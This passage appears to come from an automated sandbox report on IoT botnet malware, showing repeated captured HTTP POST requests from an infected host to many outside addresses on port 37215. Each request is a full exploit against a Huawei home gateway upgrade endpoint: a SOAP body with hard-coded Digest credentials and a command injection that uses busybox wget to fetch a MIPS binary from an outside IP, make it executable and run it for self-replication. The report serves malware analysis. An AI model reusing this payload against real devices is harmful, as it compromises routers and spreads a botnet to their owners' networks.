6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22192.168.2.2344014143.179.199.14637215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221144915 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23192.168.2.234265047.7.162.22937215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221189976 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24192.168.2.2358196197.77.131.5337215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221220016 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25192.168.2.2344052197.23.80.24537215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221223116 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26192.168.2.2347068197.30.15.10337215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221220016 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      27192.168.2.234779441.166.85.15037215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221220016 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      28192.168.2.234404041.242.31.13337215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221247911 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      29192.168.2.233800041.143.61.10337215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221247911 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      30192.168.2.2338628157.240.255.13437215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221272945 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      31192.168.2.2343126197.4.26.12637215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221280098 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      32192.168.2.2349974197.231.189.10937215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221301079 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
